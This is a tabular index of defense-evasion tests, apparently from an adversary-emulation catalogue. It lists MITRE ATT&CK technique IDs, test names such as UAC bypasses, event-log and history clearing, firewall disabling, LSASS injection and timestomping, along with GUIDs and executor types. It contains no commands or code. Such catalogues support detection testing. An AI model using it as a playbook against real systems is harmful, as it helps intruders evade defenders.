35 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
36 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
37 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
38 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
39 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
40 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
41 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
42 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
43 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
44 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
45 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
46 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
47 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
48 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
49 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
50 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
51 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 18 WinPwn - UAC Magic 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc powershell
52 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 19 WinPwn - UAC Bypass ccmstp technique f3c145f9-3c8d-422c-bd99-296a17a8f567 powershell
53 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 20 WinPwn - UAC Bypass DiskCleanup technique 1ed67900-66cd-4b09-b546-2a0ef4431a0c powershell
54 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 21 WinPwn - UAC Bypass DccwBypassUAC technique 2b61977b-ae2d-4ae4-89cb-5c36c89586be powershell
55 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key 251c5936-569f-42f4-9ac2-87a173b9e9b8 powershell
56 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 23 UAC Bypass with WSReset Registry Modification 3b96673f-9c92-40f1-8a3e-ca060846f8d9 powershell
57 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
58 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
59 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
60 defense-evasion T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
61 defense-evasion T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
62 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
63 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 2 Masquerade as a built-in system executable 35eb8d16-9820-4423-a2a1-90c4f5edd9ca powershell
64 defense-evasion T1564 Hide Artifacts 1 Extract binary files via VBA 6afe288a-8a8b-4d33-a629-8d03ba9dad3a powershell
65 defense-evasion T1564 Hide Artifacts 2 Create a Hidden User Called "$" 2ec63cc2-4975-41a6-bf09-dffdfb610778 command_prompt
66 defense-evasion T1564 Hide Artifacts 3 Create an "Administrator " user (with a space on the end) 5bb20389-39a5-4e99-9264-aeb92a55a85c powershell
67 defense-evasion T1564 Hide Artifacts 4 Create and Hide a Service with sc.exe 333c7de0-6fbe-42aa-ac2b-c7e40b18246a command_prompt
68 defense-evasion T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
69 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
70 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
71 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
72 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
73 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
74 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 2 Overwrite Linux Mail Spool 1602ff76-ed7f-4c94-b550-2f727b4782d4 bash
75 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 3 Overwrite Linux Log d304b2dc-90b4-4465-a650-16ddd503f7b5 bash
76 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 1 CheckIfInstallable method call ffd9c807-d402-47d2-879d-f915cf2a3a94 powershell
77 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 2 InstallHelper method call d43a5bde-ae28-4c55-a850-3f4c80573503 powershell
78 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 3 InstallUtil class constructor method call 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 powershell
79 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 4 InstallUtil Install method call 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b powershell
80 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 5 InstallUtil Uninstall method call - /U variant 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b powershell
81 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 6 InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant 06d9deba-f732-48a8-af8e-bdd6e4d98c1d powershell
82 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 7 InstallUtil HelpText method call 5a683850-1145-4326-a0e5-e91ced3c6022 powershell
83 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 8 InstallUtil evasive invocation 559e6d06-bb42-4307-bff7-3b95a8254bad powershell
84 defense-evasion T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
85 defense-evasion T1553.001 Subvert Trust Controls: Gatekeeper Bypass 1 Gatekeeper Bypass fb3d46c6-9480-4803-8d7d-ce676e1f1a9b sh
86 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 Take ownership using takeown utility 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 command_prompt
87 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 2 cacls - Grant permission to specified user or group recursively a8206bcc-f282-40a9-a389-05d9c0263485 command_prompt
88 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 3 attrib - Remove read-only attribute bec1e95c-83aa-492e-ab77-60c71bbd21b0 command_prompt
89 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 4 attrib - hide file 32b979da-7b68-42c9-9a99-0e39900fc36c command_prompt
90 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 5 Grant Full Access to folder for Everyone - Ryuk Ransomware Style ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt
91 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 1 Msiexec.exe - Execute Local MSI file with embedded JScript a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04 command_prompt
92 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 2 Msiexec.exe - Execute Local MSI file with embedded VBScript 8d73c7b0-c2b1-4ac1-881a-4aa644f76064 command_prompt
93 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 3 Msiexec.exe - Execute Local MSI file with an embedded DLL 628fa796-76c5-44c3-93aa-b9d8214fd568 command_prompt
94 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 4 Msiexec.exe - Execute Local MSI file with an embedded EXE ed3fa08a-ca18-4009-973e-03d13014d0e8 command_prompt
95 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 5 WMI Win32_Product Class - Execute Local MSI file with embedded JScript 882082f0-27c6-4eec-a43c-9aa80bccdb30 powershell
96 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 6 WMI Win32_Product Class - Execute Local MSI file with embedded VBScript cf470d9a-58e7-43e5-b0d2-805dffc05576 powershell
97 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 7 WMI Win32_Product Class - Execute Local MSI file with an embedded DLL 32eb3861-30da-4993-897a-42737152f5f8 powershell
98 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 8 WMI Win32_Product Class - Execute Local MSI file with an embedded EXE 55080eb0-49ae-4f55-a440-4167b7974f79 powershell
99 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 9 Msiexec.exe - Execute the DllRegisterServer function of a DLL 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d command_prompt
100 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 10 Msiexec.exe - Execute the DllUnregisterServer function of a DLL ab09ec85-4955-4f9c-b8e0-6851baf4d47f command_prompt
101 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 11 Msiexec.exe - Execute Remote MSI file 44a4bedf-ffe3-452e-bee4-6925ab125662 command_prompt
102 defense-evasion T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
103 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
104 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 2 Clear Bash history (echo) cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 sh
105 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
106 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
107 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 5 Clear Bash history (truncate) 47966a1d-df4f-4078-af65-db6d9aa20739 sh
108 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
109 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
110 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
111 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 9 Disable Bash History Logging with SSH -T 5f8abd62-f615-43c5-b6be-f780f25790a1 sh
112 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 10 Prevent Powershell History Logging 2f898b81-3e97-4abb-bc3f-a95138988370 powershell
113 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 11 Clear Powershell History by Deleting History File da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
114 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 12 Set Custom AddToHistoryHandler to Avoid History File Logging 1d0d9aa6-6111-4f89-927b-53e8afae7f94 powershell
115 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
116 defense-evasion T1202 Indirect Command Execution 2 Indirect Command Execution - forfiles.exe 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc command_prompt
117 defense-evasion T1202 Indirect Command Execution 3 Indirect Command Execution - conhost.exe cf3391e0-b482-4b02-87fc-ca8362269b29 command_prompt
118 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
119 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
120 defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
121 defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
122 defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
123 defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
124 defense-evasion T1562 Impair Defenses 1 Windows Disable LSA Protection 40075d5f-3a70-4c66-9125-f72bee87247d command_prompt
125 defense-evasion T1055.003 Thread Execution Hijacking 1 Thread Execution Hijacking 578025d5-faa9-4f6d-8390-aae527d503e1 powershell
126 defense-evasion T1036 Masquerading 1 System File Copied to Unusual Location 51005ac7-52e2-45e0-bdab-d17c6d4916cd powershell
127 defense-evasion T1036 Masquerading 2 Malware Masquerading and Execution from Zip File 4449c89b-ec82-43a4-89c1-91e2f1abeecc powershell
128 defense-evasion T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
129 defense-evasion T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
130 defense-evasion T1218 Signed Binary Proxy Execution 1 mavinject - Inject DLL into running process c426dacf-575d-4937-8611-a148a86a5e61 command_prompt
131 defense-evasion T1218 Signed Binary Proxy Execution 2 Register-CimProvider - Execute evil dll ad2c17ed-f626-4061-b21e-b9804a6f3655 command_prompt
132 defense-evasion T1218 Signed Binary Proxy Execution 3 InfDefaultInstall.exe .inf Execution 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef command_prompt
133 defense-evasion T1218 Signed Binary Proxy Execution 4 ProtocolHandler.exe Downloaded a Suspicious File db020456-125b-4c8b-a4a7-487df8afb5a2 command_prompt
134 defense-evasion T1218 Signed Binary Proxy Execution 5 Microsoft.Workflow.Compiler.exe Payload Execution 7cbb0f26-a4c1-4f77-b180-a009aa05637e powershell
135 defense-evasion T1218 Signed Binary Proxy Execution 6 Renamed Microsoft.Workflow.Compiler.exe Payload Executions 4cc40fd7-87b8-4b16-b2d7-57534b86b911 powershell
136 defense-evasion T1218 Signed Binary Proxy Execution 7 Invoke-ATHRemoteFXvGPUDisablementCommand base test 9ebe7901-7edf-45c0-b5c7-8366300919db powershell
137 defense-evasion T1218 Signed Binary Proxy Execution 8 DiskShadow Command Execution 0e1483ba-8f0c-425d-b8c6-42736e058eaa powershell
138 defense-evasion T1218 Signed Binary Proxy Execution 9 Load Arbitrary DLL via Wuauclt (Windows Update Client) 49fbd548-49e9-4bb7-94a6-3769613912b8 command_prompt
139 defense-evasion T1218 Signed Binary Proxy Execution 10 Lolbin Gpscript logon option 5bcda9cd-8e85-48fa-861d-b5a85d91d48c command_prompt
140 defense-evasion T1218 Signed Binary Proxy Execution 11 Lolbin Gpscript startup option f8da74bb-21b8-4af9-8d84-f2c8e4a220e3 command_prompt
141 defense-evasion T1218 Signed Binary Proxy Execution 12 Lolbas ie4uinit.exe use as proxy 13c0804e-615e-43ad-b223-2dfbacd0b0b3 command_prompt
142 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
143 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
144 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
145 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
146 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 5 Windows - Modify file creation timestamp with PowerShell b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c powershell
147 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 6 Windows - Modify file last modified timestamp with PowerShell f8f6634d-93e1-4238-8510-f8a90a20dcf2 powershell
148 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 7 Windows - Modify file last access timestamp with PowerShell da627f63-b9bd-4431-b6f8-c5b44d061a62 powershell
149 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 8 Windows - Timestomp a File d7512c33-3a75-4806-9893-69abc3ccdd43 powershell
150 defense-evasion T1620 Reflective Code Loading 1 WinPwn - Reflectively load Mimik@tz into memory 56b9589c-9170-4682-8c3d-33b86ecb5119 powershell
151 defense-evasion T1218.003 Signed Binary Proxy Execution: CMSTP 1 CMSTP Executing Remote Scriptlet 34e63321-9683-496b-bbc1-7566bc55e624 command_prompt
152 defense-evasion T1218.003 Signed Binary Proxy Execution: CMSTP 2 CMSTP Executing UAC Bypass 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 command_prompt
153 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
154 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 2 Kill Event Log Service Threads 41ac52ba-5d5e-40c0-b267-573ed90489bd powershell
155 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 3 Impair Windows Audit Log Policy 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 command_prompt
156 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 4 Clear Windows Audit Policy Config 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 command_prompt
157 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 5 Disable Event Logging with wevtutil b26a3340-dad7-4360-9176-706269c74103 command_prompt
158 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 6 Makes Eventlog blind with Phant0m 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741 command_prompt
159 defense-evasion T1218.002 Signed Binary Proxy Execution: Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
160 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 1 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
161 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall via Registry afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
162 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 3 Allow SMB and RDP on Microsoft Defender Firewall d9841bf8-f161-4c73-81e9-fd773a5ff8c1 command_prompt
163 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 4 Opening ports for proxy - HARDRAIN 15e57006-79dd-46df-9bf9-31bc24fb5a80 command_prompt
164 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 5 Open a local port through Windows Firewall to any profile 9636dd6e-7599-40d2-8eee-ac16434f35ed powershell
165 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 6 Allow Executable Through Firewall Located in Non-Standard Location 6f5822d2-d38d-4f48-9bfc-916607ff6b8c powershell
166 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 7 Stop/Start UFW firewall fe135572-edcd-49a2-afe6-1d39521c5a9a sh
167 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 8 Stop/Start UFW firewall systemctl 9fd99609-1854-4f3c-b47b-97d9a5972bd1 sh
168 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 9 Turn off UFW logging 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad sh
169 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 10 Add and delete UFW firewall rules b2563a4e-c4b8-429c-8d47-d5bcb227ba7a sh
170 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 11 Edit UFW firewall user.rules file beaf815a-c883-4194-97e9-fdbbb2bbdd7c sh
171 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 12 Edit UFW firewall ufw.conf file c1d8c4eb-88da-4927-ae97-c7c25893803b sh
172 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 13 Edit UFW firewall sysctl.conf file c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 sh
173 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 14 Edit UFW firewall main configuration file 7b697ece-8270-46b5-bbc7-6b9e27081831 sh
174 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 15 Tail the UFW firewall log file 419cca0c-fa52-4572-b0d7-bc7c6f388a27 sh
175 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 16 LockBit Black - Unusual Windows firewall registry modification -cmd a4651931-ebbb-4cde-9363-ddf3d66214cb command_prompt
176 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 17 LockBit Black - Unusual Windows firewall registry modification -Powershell 80b453d1-eec5-4144-bf08-613a6c3ffe12 powershell
177 defense-evasion T1207 Rogue Domain Controller 1 DCShadow (Active Directory) 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 powershell
178 defense-evasion T1112 Modify Registry 1 Modify Registry of Current User Profile - cmd 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 command_prompt
179 defense-evasion T1112 Modify Registry 2 Modify Registry of Local Machine - cmd 282f929a-6bc5-42b8-bd93-960c3ba35afe command_prompt
180 defense-evasion T1112 Modify Registry 3 Modify registry to store logon credentials c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 command_prompt
181 defense-evasion T1112 Modify Registry 4 Add domain to Trusted sites Zone cf447677-5a4e-4937-a82c-e47d254afd57 powershell
182 defense-evasion T1112 Modify Registry 5 Javascript in registry 15f44ea9-4571-4837-be9e-802431a7bfae powershell
183 defense-evasion T1112 Modify Registry 6 Change Powershell Execution Policy to Bypass f3a6cceb-06c9-48e5-8df8-8867a6814245 powershell
184 defense-evasion T1112 Modify Registry 7 BlackByte Ransomware Registry Changes - CMD 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b command_prompt
185 defense-evasion T1112 Modify Registry 8 BlackByte Ransomware Registry Changes - Powershell 0b79c06f-c788-44a2-8630-d69051f1123d powershell
186 defense-evasion T1112 Modify Registry 9 Disable Windows Registry Tool ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 command_prompt
187 defense-evasion T1112 Modify Registry 10 Disable Windows CMD application d2561a6d-72bd-408c-b150-13efe1801c2a powershell
188 defense-evasion T1112 Modify Registry 11 Disable Windows Task Manager application af254e70-dd0e-4de6-9afe-a994d9ea8b62 command_prompt
189 defense-evasion T1112 Modify Registry 12 Disable Windows Notification Center c0d6d67f-1f63-42cc-95c0-5fd6b20082ad command_prompt
190 defense-evasion T1112 Modify Registry 13 Disable Windows Shutdown Button 6e0d1131-2d7e-4905-8ca5-d6172f05d03d command_prompt
191 defense-evasion T1112 Modify Registry 14 Disable Windows LogOff Button e246578a-c24d-46a7-9237-0213ff86fb0c command_prompt
192 defense-evasion T1112 Modify Registry 15 Disable Windows Change Password Feature d4a6da40-618f-454d-9a9e-26af552aaeb0 command_prompt
193 defense-evasion T1112 Modify Registry 16 Disable Windows Lock Workstation Feature 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 command_prompt
194 defense-evasion T1112 Modify Registry 17 Activate Windows NoDesktop Group Policy Feature 93386d41-525c-4a1b-8235-134a628dee17 command_prompt
195 defense-evasion T1112 Modify Registry 18 Activate Windows NoRun Group Policy Feature d49ff3cc-8168-4123-b5b3-f057d9abbd55 command_prompt
196 defense-evasion T1112 Modify Registry 19 Activate Windows NoFind Group Policy Feature ffbb407e-7f1d-4c95-b22e-548169db1fbd command_prompt
197 defense-evasion T1112 Modify Registry 20 Activate Windows NoControlPanel Group Policy Feature a450e469-ba54-4de1-9deb-9023a6111690 command_prompt
198 defense-evasion T1112 Modify Registry 21 Activate Windows NoFileMenu Group Policy Feature 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 command_prompt
199 defense-evasion T1112 Modify Registry 22 Activate Windows NoClose Group Policy Feature 12f50e15-dbc6-478b-a801-a746e8ba1723 command_prompt
200 defense-evasion T1112 Modify Registry 23 Activate Windows NoSetTaskbar Group Policy Feature d29b7faf-7355-4036-9ed3-719bd17951ed command_prompt
201 defense-evasion T1112 Modify Registry 24 Activate Windows NoTrayContextMenu Group Policy Feature 4d72d4b1-fa7b-4374-b423-0fe326da49d2 command_prompt
202 defense-evasion T1112 Modify Registry 25 Activate Windows NoPropertiesMyDocuments Group Policy Feature 20fc9daa-bd48-4325-9aff-81b967a84b1d command_prompt
203 defense-evasion T1112 Modify Registry 26 Hide Windows Clock Group Policy Feature 8023db1e-ad06-4966-934b-b6a0ae52689e command_prompt
204 defense-evasion T1112 Modify Registry 27 Windows HideSCAHealth Group Policy Feature a4637291-40b1-4a96-8c82-b28f1d73e54e command_prompt
205 defense-evasion T1112 Modify Registry 28 Windows HideSCANetwork Group Policy Feature 3e757ce7-eca0-411a-9583-1c33b8508d52 command_prompt
206 defense-evasion T1112 Modify Registry 29 Windows HideSCAPower Group Policy Feature 8d85a5d8-702f-436f-bc78-fcd9119496fc command_prompt
207 defense-evasion T1112 Modify Registry 30 Windows HideSCAVolume Group Policy Feature 7f037590-b4c6-4f13-b3cc-e424c5ab8ade command_prompt
208 defense-evasion T1112 Modify Registry 31 Windows Modify Show Compress Color And Info Tip Registry 795d3248-0394-4d4d-8e86-4e8df2a2693f command_prompt
209 defense-evasion T1112 Modify Registry 32 Windows Powershell Logging Disabled 95b25212-91a7-42ff-9613-124aca6845a8 command_prompt
210 defense-evasion T1112 Modify Registry 33 Windows Add Registry Value to Load Service in Safe Mode without Network 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5 command_prompt
211 defense-evasion T1112 Modify Registry 34 Windows Add Registry Value to Load Service in Safe Mode with Network c173c948-65e5-499c-afbe-433722ed5bd4 command_prompt
212 defense-evasion T1112 Modify Registry 35 Disable Windows Toast Notifications 003f466a-6010-4b15-803a-cbb478a314d7 command_prompt
213 defense-evasion T1112 Modify Registry 36 Disable Windows Security Center Notifications 45914594-8df6-4ea9-b3cc-7eb9321a807e command_prompt
214 defense-evasion T1112 Modify Registry 37 Suppress Win Defender Notifications c30dada3-7777-4590-b970-dc890b8cf113 command_prompt
215 defense-evasion T1112 Modify Registry 38 Allow RDP Remote Assistance Feature 86677d0e-0b5e-4a2b-b302-454175f9aa9e command_prompt
216 defense-evasion T1112 Modify Registry 39 NetWire RAT Registry Key Creation 65704cd4-6e36-4b90-b6c1-dc29a82c8e56 command_prompt
217 defense-evasion T1112 Modify Registry 40 Ursnif Malware Registry Key Creation c375558d-7c25-45e9-bd64-7b23a97c1db0 command_prompt
218 defense-evasion T1112 Modify Registry 41 Terminal Server Client Connection History Cleared 3448824b-3c35-4a9e-a8f5-f887f68bea21 command_prompt
219 defense-evasion T1112 Modify Registry 42 Disable Windows Error Reporting Settings d2c9e41e-cd86-473d-980d-b6403562e3e1 command_prompt
